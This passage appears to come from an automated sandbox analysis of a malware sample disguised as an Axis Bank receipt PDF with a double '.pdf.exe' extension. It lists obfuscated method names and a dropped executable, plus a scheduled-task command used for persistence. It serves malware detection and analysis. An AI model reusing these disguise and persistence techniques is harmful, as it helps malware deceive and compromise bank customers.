Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0042D963 pushfd ; retf 10_2_0042D96E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0042F1A2 push eax; ret 10_2_0042F1A4
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00401AC4 push es; retf 10_2_00401ACA
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00415AB3 push ss; iretd 10_2_00415AC9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00405346 push ds; iretd 10_2_00405352
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00419333 push es; iretd 10_2_0041933B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00401BF9 push es; retf 10_2_00401BFA
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00418C53 push ss; ret 10_2_00418C61
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0041DC5D push es; retf 10_2_0041DC5E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00419D49 push edx; retf 10_2_00419D50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00403670 push eax; ret 10_2_00403672
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00412E00 push esp; retf 10_2_00412E03
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00412ED2 push esp; retf 10_2_00412F4C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00405F38 push esi; ret 10_2_00405F39
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0041A7CE pushad ; retf 10_2_0041A7CF
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A5225F pushad ; ret 10_2_01A527F9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A527FA pushad ; ret 10_2_01A527F9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A809AD push ecx; mov dword ptr [esp], ecx 10_2_01A809B6
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A5283D push eax; iretd 10_2_01A52858
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A5135E push eax; iretd 10_2_01A51369
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07612BCD pushfd ; retf 11_2_07612BCF
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07613644 push cs; retf 11_2_07613647
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07612C18 pushfd ; retf 11_2_07612C19
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D225F pushad ; ret 14_2_034D27F9
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D27FA pushad ; ret 14_2_034D27F9
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035009AD push ecx; mov dword ptr [esp], ecx 14_2_035009B6
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D283D push eax; iretd 14_2_034D2858
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034D135E push eax; iretd 14_2_034D1369
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B5A2F0 pushfd ; retf 14_2_02B5A2FB
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B466D6 push edx; retf 14_2_02B466DD
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: section name: .text entropy: 7.962604649793217
Source: OkLsTLaTTZVp.exe.0.dr Static PE information: section name: .text entropy: 7.962604649793217
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, R87QTajabri3WprdxA.cs High entropy of concatenated method names: 'SoFXXYTXBr', 'VXePqW7LxoGttIrQMM', 'VJKqh4rSy8UE5CPs2d', 'w7T6rNymrPsVe05ZjX', 'Qa5usbZfG', 'UsaN6r2JI', 'Dispose', 'xdE70OV1R', 'WKG8Nh2TLfQX7DMBJq', 'FCyDZoO16YhsTUYx7V'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, I1Ds3abkUA5mh3kywv.cs High entropy of concatenated method names: 'I6pnpGMEc', 'pUPSoKeTB', 'w3OonGh86', 'S3aaCOvyF', 'MagvcleIh', 'hvmph4XfL', 'eXtqEM8mO', 'RC38AH4Bb', 'hyVW2X9uL', 'AbHynsT40'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs High entropy of concatenated method names: 'sRJJ4PC1lt6MgSX9oLN', 'qCuPUJCYMdGJYrcKdqj', 'T9OMNMJAsS', 'KH71sVC96gudd8OjhqS', 'qSoaq8CnboJYXbPCm1H', 'XtbiVDCeUWVlZdG2V08', 'D2TFRiCIaLSytg31rTE', 'MtxGm4CM57HGXUKQMIN', 'RgtTUJcyZL', 'eFmMT9Tlnp'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, QEHxtuXFnnkJABhbAo.cs High entropy of concatenated method names: 'Geosg7Hdn', 'wwIBOnTmd', 'siWV4YECO', 'k32FNitut', 'cUAG5mh3k', 'JwvHwu9Dw', 'cr1hyajqeLqaQ4F9dK', 'Pgut89mcfAIn6Hs5oN', 'Dispose', 'MoveNext'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, je12fKzbqlvlhh5Sw5.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NCqdN3q9yj', 'E71dM8lmux', 'y9xdOCbyXq', 'l30d3Y4KrP', 'p8NdX01hgU', 'xdedd9bUtp', 'nTgdWSQKbO'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, y5OwDGCI0XZphscq3k.cs High entropy of concatenated method names: 'ToString', 'wG7OjY9hhe', 'dXAOkB3ib5', 'paHOlIRw1n', 'qroOGW45Pv', 'vhpOtmoTcW', 'r2uO0whVDt', 'ptgOA2ZpCe', 'fE7ObTFnYn', 'IAEOQJjiJ4'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, i0HS5Y8Nl5CqmIqava.cs High entropy of concatenated method names: 'W3cXyvGgco', 'wL3XkTdFXp', 'PvFXlwHEbQ', 'v8CXGUygDr', 'elyXPHORX2', 'w0yXt3IPdN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, sgrpkgpJZiuZO7eUJE.cs High entropy of concatenated method names: 'evxX5pidEM', 'KaGXVOMX2V', 'JJSXs0YsnC', 'cOWXiIV1qA', 'lUEX9KhFIi', 'gSHXfbFnxN', 'fCIXgijRFr', 'uFuXKDmWJ1', 'quTXhHQ54J', 'FrQX8UhLux'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, nsH1JWbGwc8udauju3.cs High entropy of concatenated method names: 'Dispose', 'r0cREljbsW', 'XqYFkvhDKs', 'n4uuu6j7YV', 'RpdR21KdK6', 'qkXRz3NMWD', 'ProcessDialogKey', 'FwwFUdyUDl', 'NGxFRnDqFu', 'xdgFFosUhE'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, RCutH3vy9Ka5RGka45.cs High entropy of concatenated method names: 'VYRf5bfV53', 'kSHfsfd2Rq', 'o8pf9cEPhO', 'bvC92bi5LC', 'hmN9z3VDY7', 'Y0rfUIVjHP', 'oRCfRDY3m1', 'J62fFSI3py', 'tv2faqXUU7', 'dFGfDCxBwn'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, cq71mJaENdAY1diACM.cs High entropy of concatenated method names: 'Mq83p9wQJJ', 'pjv32IjwCv', 'y5GXUUiqR4', 'pq5XRkmlgZ', 'rh53j4btxC', 'eqs3rFkKc8', 'esG3qTvqdk', 'Mxf3PiYw4u', 'ijr3mUmWMK', 'Our3wsowXk'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, TxkjgU7KpjUcj6d00I.cs High entropy of concatenated method names: 'tMSRfJfk49', 'ehuRgvB0Rd', 'OtXRhGdLRN', 'n9TR8nS4EP', 'F8tRMXoI8I', 'RiWROv5dOB', 'Wqi4Hw9Zb3NP7jdyAX', 'I0f5SCn5UF85l3MUK3', 'O9LRRthbZy', 'Hu4RaQcTcZ'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, aDZZsU69YRMkmFNseNy.cs High entropy of concatenated method names: 'OiVdnkeeMc', 'RS7dYelNNt', 'JOKdxLL69q', 'o0CdSWicDG', 'uXOdCpoXjL', 'bH9dLaR3q9', 'oVId44Qaa6', 'EWgd72LIEf', 'XkJdcG8y6i', 'OaEdB6UGff'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs High entropy of concatenated method names: 'mpQavMd8Gk', 'pJea5E6nFI', 'WVRaVvSHW3', 'je3asAHxyk', 'Ix2aiCGTGh', 'NmLa9RYTQZ', 'DO9afZEVjm', 'uVbagfHjBj', 'W9FaKY5MTG', 'KdgahYqqrm'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, M6wynbsTFcTkCcoXC7.cs High entropy of concatenated method names: 'aADVPi6xSA', 'CndVmKJQhx', 'SpwVwfZd16', 'Q0qV1GQGfC', 'Td9VThTevn', 'JO2V6HYVDh', 'gmhVHl5klb', 'YyHVpbcLMn', 'NSWVEnUtX6', 'KacV2YuDZJ'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, xXqKsdqB8BE73jGv02.cs High entropy of concatenated method names: 'DuMxBULq0', 'EvnSvddnV', 'zg5LH5w1I', 'VO649r7Qp', 'SZHcNjhHX', 'VyDBcDwtr', 'tVuhed8d3hPSFZMrDm', 'lVmTM1OX2mHW2sjltt', 'nwUXURl6l', 'XdBWvyRZv'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, BL3jIPrlS8IARWxgrv.cs High entropy of concatenated method names: 'AkqfnZwaKh', 'SlOfYtahKc', 'zErfxbfJ1l', 'jnlfSfosFo', 'i6ufCvk8d0', 'duBfLKBh9m', 'xrUf4neqXa', 'qw4f7lx3xK', 'cr8fciUIo5', 'VRnfBxPMi3'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, r7tt8LiKpcX3pexyT0.cs High entropy of concatenated method names: 'WpniCxTBSf', 'BwBi4B4rgj', 'PbnslqRvRk', 'MvFsGFZMTt', 'Rm7stVW3fn', 'tacs07fHOP', 'PNxsA828Qo', 'lIhsbI2BpY', 'KYFsQ6T0Xo', 'pDvsIhMYru'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, HuDJZjXpajnPc2CELg.cs High entropy of concatenated method names: 'h6FL4Dgo5YZp3fc3kln', 'rq4DUBgurCXNkeg9D6H', 'LYK9XiP7LB', 'qul9dOBFJx', 'WmR9WCFSOD', 'UVi2Otgqym7v7aJl0q1', 'MSjkrBgPjMfxs0EZ2T1'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, KnXXj9Ve6PFqPYcw1U.cs High entropy of concatenated method names: 'Wp19vSwYsA', 'ffb9VPURsn', 'Gyx9iS6SQt', 'CpF9fBI0Fq', 'YP39gSPY7J', 'fokiTiNadD', 'wBsi6caKrC', 'DrViHVqynW', 's3OipdTW8B', 'csMiE4v0Ph'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, Njj0X7661T0BXpGZVk7.cs High entropy of concatenated method names: 'ToString', 'LbKWaGeyZH', 's3UWD6pSVT', 'HxhWvdEywi', 'DDLW5kumRM', 'i7WWVOGcYU', 'KpZWsPUFGs', 'JlKWiFouj3', 'PU43rtJdXh1VIS7Rh8c', 'Cn7x5vJ2m6sp3XB6Eyc'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, HgJBnb6Sy4aMiCO7xW7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fR8WPQ6FMk', 'wiXWmYTSMM', 'JbxWwYIjjJ', 'h40W1fVrim', 'iWYWTNq8rY', 't45W6WasUQ', 'MhqWHCbCSL'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, UtQBwMnXjJwtHv7Nkt.cs High entropy of concatenated method names: 'xxNN7kByCP', 'Go7Ncc8PZv', 'gjyNyjqP5D', 'Ah3NkDqjtP', 'oebNGoH0xe', 'SMBNtOScYy', 'VENNANaT1v', 'DcoNbb0ahd', 'u83NIC7mDB', 'llGNjKaCoy'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, etUeAaUCQGS66h1mCE.cs High entropy of concatenated method names: 'dTkdRidcIM', 'IbAdavu2no', 'slndDhPHep', 'lpdd5Bj9qn', 'GfWdVF3WQV', 'q3odi6KBbw', 'Cbrd95d6lk', 'BkkXHCM4Eq', 'YwaXp8S2qr', 'X5sXEwgCm9'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, Ljq9BXmisli65B6nbT.cs High entropy of concatenated method names: 'f45sSNkZIZ', 'ncysLC1x3X', 'bols7h8ApE', 'E73scBPhI0', 'so5sMAWhoC', 'rlnsOjTZSJ', 'jk6s3st21w', 'SAcsXECSNB', 'nPMsdKkcve', 'J7MsWLkewj'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, R87QTajabri3WprdxA.cs High entropy of concatenated method names: 'SoFXXYTXBr', 'VXePqW7LxoGttIrQMM', 'VJKqh4rSy8UE5CPs2d', 'w7T6rNymrPsVe05ZjX', 'Qa5usbZfG', 'UsaN6r2JI', 'Dispose', 'xdE70OV1R', 'WKG8Nh2TLfQX7DMBJq', 'FCyDZoO16YhsTUYx7V'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, I1Ds3abkUA5mh3kywv.cs High entropy of concatenated method names: 'I6pnpGMEc', 'pUPSoKeTB', 'w3OonGh86', 'S3aaCOvyF', 'MagvcleIh', 'hvmph4XfL', 'eXtqEM8mO', 'RC38AH4Bb', 'hyVW2X9uL', 'AbHynsT40'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs High entropy of concatenated method names: 'sRJJ4PC1lt6MgSX9oLN', 'qCuPUJCYMdGJYrcKdqj', 'T9OMNMJAsS', 'KH71sVC96gudd8OjhqS', 'qSoaq8CnboJYXbPCm1H', 'XtbiVDCeUWVlZdG2V08', 'D2TFRiCIaLSytg31rTE', 'MtxGm4CM57HGXUKQMIN', 'RgtTUJcyZL', 'eFmMT9Tlnp'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, QEHxtuXFnnkJABhbAo.cs High entropy of concatenated method names: 'Geosg7Hdn', 'wwIBOnTmd', 'siWV4YECO', 'k32FNitut', 'cUAG5mh3k', 'JwvHwu9Dw', 'cr1hyajqeLqaQ4F9dK', 'Pgut89mcfAIn6Hs5oN', 'Dispose', 'MoveNext'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, je12fKzbqlvlhh5Sw5.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NCqdN3q9yj', 'E71dM8lmux', 'y9xdOCbyXq', 'l30d3Y4KrP', 'p8NdX01hgU', 'xdedd9bUtp', 'nTgdWSQKbO'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, y5OwDGCI0XZphscq3k.cs High entropy of concatenated method names: 'ToString', 'wG7OjY9hhe', 'dXAOkB3ib5', 'paHOlIRw1n', 'qroOGW45Pv', 'vhpOtmoTcW', 'r2uO0whVDt', 'ptgOA2ZpCe', 'fE7ObTFnYn', 'IAEOQJjiJ4'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, i0HS5Y8Nl5CqmIqava.cs High entropy of concatenated method names: 'W3cXyvGgco', 'wL3XkTdFXp', 'PvFXlwHEbQ', 'v8CXGUygDr', 'elyXPHORX2', 'w0yXt3IPdN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, sgrpkgpJZiuZO7eUJE.cs High entropy of concatenated method names: 'evxX5pidEM', 'KaGXVOMX2V', 'JJSXs0YsnC', 'cOWXiIV1qA', 'lUEX9KhFIi', 'gSHXfbFnxN', 'fCIXgijRFr', 'uFuXKDmWJ1', 'quTXhHQ54J', 'FrQX8UhLux'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, nsH1JWbGwc8udauju3.cs High entropy of concatenated method names: 'Dispose', 'r0cREljbsW', 'XqYFkvhDKs', 'n4uuu6j7YV', 'RpdR21KdK6', 'qkXRz3NMWD', 'ProcessDialogKey', 'FwwFUdyUDl', 'NGxFRnDqFu', 'xdgFFosUhE'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, RCutH3vy9Ka5RGka45.cs High entropy of concatenated method names: 'VYRf5bfV53', 'kSHfsfd2Rq', 'o8pf9cEPhO', 'bvC92bi5LC', 'hmN9z3VDY7', 'Y0rfUIVjHP', 'oRCfRDY3m1', 'J62fFSI3py', 'tv2faqXUU7', 'dFGfDCxBwn'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, cq71mJaENdAY1diACM.cs High entropy of concatenated method names: 'Mq83p9wQJJ', 'pjv32IjwCv', 'y5GXUUiqR4', 'pq5XRkmlgZ', 'rh53j4btxC', 'eqs3rFkKc8', 'esG3qTvqdk', 'Mxf3PiYw4u', 'ijr3mUmWMK', 'Our3wsowXk'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, TxkjgU7KpjUcj6d00I.cs High entropy of concatenated method names: 'tMSRfJfk49', 'ehuRgvB0Rd', 'OtXRhGdLRN', 'n9TR8nS4EP', 'F8tRMXoI8I', 'RiWROv5dOB', 'Wqi4Hw9Zb3NP7jdyAX', 'I0f5SCn5UF85l3MUK3', 'O9LRRthbZy', 'Hu4RaQcTcZ'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, aDZZsU69YRMkmFNseNy.cs High entropy of concatenated method names: 'OiVdnkeeMc', 'RS7dYelNNt', 'JOKdxLL69q', 'o0CdSWicDG', 'uXOdCpoXjL', 'bH9dLaR3q9', 'oVId44Qaa6', 'EWgd72LIEf', 'XkJdcG8y6i', 'OaEdB6UGff'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs High entropy of concatenated method names: 'mpQavMd8Gk', 'pJea5E6nFI', 'WVRaVvSHW3', 'je3asAHxyk', 'Ix2aiCGTGh', 'NmLa9RYTQZ', 'DO9afZEVjm', 'uVbagfHjBj', 'W9FaKY5MTG', 'KdgahYqqrm'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, M6wynbsTFcTkCcoXC7.cs High entropy of concatenated method names: 'aADVPi6xSA', 'CndVmKJQhx', 'SpwVwfZd16', 'Q0qV1GQGfC', 'Td9VThTevn', 'JO2V6HYVDh', 'gmhVHl5klb', 'YyHVpbcLMn', 'NSWVEnUtX6', 'KacV2YuDZJ'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, xXqKsdqB8BE73jGv02.cs High entropy of concatenated method names: 'DuMxBULq0', 'EvnSvddnV', 'zg5LH5w1I', 'VO649r7Qp', 'SZHcNjhHX', 'VyDBcDwtr', 'tVuhed8d3hPSFZMrDm', 'lVmTM1OX2mHW2sjltt', 'nwUXURl6l', 'XdBWvyRZv'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, BL3jIPrlS8IARWxgrv.cs High entropy of concatenated method names: 'AkqfnZwaKh', 'SlOfYtahKc', 'zErfxbfJ1l', 'jnlfSfosFo', 'i6ufCvk8d0', 'duBfLKBh9m', 'xrUf4neqXa', 'qw4f7lx3xK', 'cr8fciUIo5', 'VRnfBxPMi3'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, r7tt8LiKpcX3pexyT0.cs High entropy of concatenated method names: 'WpniCxTBSf', 'BwBi4B4rgj', 'PbnslqRvRk', 'MvFsGFZMTt', 'Rm7stVW3fn', 'tacs07fHOP', 'PNxsA828Qo', 'lIhsbI2BpY', 'KYFsQ6T0Xo', 'pDvsIhMYru'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, HuDJZjXpajnPc2CELg.cs High entropy of concatenated method names: 'h6FL4Dgo5YZp3fc3kln', 'rq4DUBgurCXNkeg9D6H', 'LYK9XiP7LB', 'qul9dOBFJx', 'WmR9WCFSOD', 'UVi2Otgqym7v7aJl0q1', 'MSjkrBgPjMfxs0EZ2T1'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, KnXXj9Ve6PFqPYcw1U.cs High entropy of concatenated method names: 'Wp19vSwYsA', 'ffb9VPURsn', 'Gyx9iS6SQt', 'CpF9fBI0Fq', 'YP39gSPY7J', 'fokiTiNadD', 'wBsi6caKrC', 'DrViHVqynW', 's3OipdTW8B', 'csMiE4v0Ph'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, Njj0X7661T0BXpGZVk7.cs High entropy of concatenated method names: 'ToString', 'LbKWaGeyZH', 's3UWD6pSVT', 'HxhWvdEywi', 'DDLW5kumRM', 'i7WWVOGcYU', 'KpZWsPUFGs', 'JlKWiFouj3', 'PU43rtJdXh1VIS7Rh8c', 'Cn7x5vJ2m6sp3XB6Eyc'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, HgJBnb6Sy4aMiCO7xW7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fR8WPQ6FMk', 'wiXWmYTSMM', 'JbxWwYIjjJ', 'h40W1fVrim', 'iWYWTNq8rY', 't45W6WasUQ', 'MhqWHCbCSL'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, UtQBwMnXjJwtHv7Nkt.cs High entropy of concatenated method names: 'xxNN7kByCP', 'Go7Ncc8PZv', 'gjyNyjqP5D', 'Ah3NkDqjtP', 'oebNGoH0xe', 'SMBNtOScYy', 'VENNANaT1v', 'DcoNbb0ahd', 'u83NIC7mDB', 'llGNjKaCoy'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, etUeAaUCQGS66h1mCE.cs High entropy of concatenated method names: 'dTkdRidcIM', 'IbAdavu2no', 'slndDhPHep', 'lpdd5Bj9qn', 'GfWdVF3WQV', 'q3odi6KBbw', 'Cbrd95d6lk', 'BkkXHCM4Eq', 'YwaXp8S2qr', 'X5sXEwgCm9'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, Ljq9BXmisli65B6nbT.cs High entropy of concatenated method names: 'f45sSNkZIZ', 'ncysLC1x3X', 'bols7h8ApE', 'E73scBPhI0', 'so5sMAWhoC', 'rlnsOjTZSJ', 'jk6s3st21w', 'SAcsXECSNB', 'nPMsdKkcve', 'J7MsWLkewj'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, R87QTajabri3WprdxA.cs High entropy of concatenated method names: 'SoFXXYTXBr', 'VXePqW7LxoGttIrQMM', 'VJKqh4rSy8UE5CPs2d', 'w7T6rNymrPsVe05ZjX', 'Qa5usbZfG', 'UsaN6r2JI', 'Dispose', 'xdE70OV1R', 'WKG8Nh2TLfQX7DMBJq', 'FCyDZoO16YhsTUYx7V'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, I1Ds3abkUA5mh3kywv.cs High entropy of concatenated method names: 'I6pnpGMEc', 'pUPSoKeTB', 'w3OonGh86', 'S3aaCOvyF', 'MagvcleIh', 'hvmph4XfL', 'eXtqEM8mO', 'RC38AH4Bb', 'hyVW2X9uL', 'AbHynsT40'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs High entropy of concatenated method names: 'sRJJ4PC1lt6MgSX9oLN', 'qCuPUJCYMdGJYrcKdqj', 'T9OMNMJAsS', 'KH71sVC96gudd8OjhqS', 'qSoaq8CnboJYXbPCm1H', 'XtbiVDCeUWVlZdG2V08', 'D2TFRiCIaLSytg31rTE', 'MtxGm4CM57HGXUKQMIN', 'RgtTUJcyZL', 'eFmMT9Tlnp'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, QEHxtuXFnnkJABhbAo.cs High entropy of concatenated method names: 'Geosg7Hdn', 'wwIBOnTmd', 'siWV4YECO', 'k32FNitut', 'cUAG5mh3k', 'JwvHwu9Dw', 'cr1hyajqeLqaQ4F9dK', 'Pgut89mcfAIn6Hs5oN', 'Dispose', 'MoveNext'
Creates processes with suspicious names
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: \axis bank - 67 account pending bank receipt.pdf.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp566C.tmp"
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"

Hooking and other Techniques for Hiding and Protection
barindex
Uses an obfuscated file name to hide its real file extension (double extension)
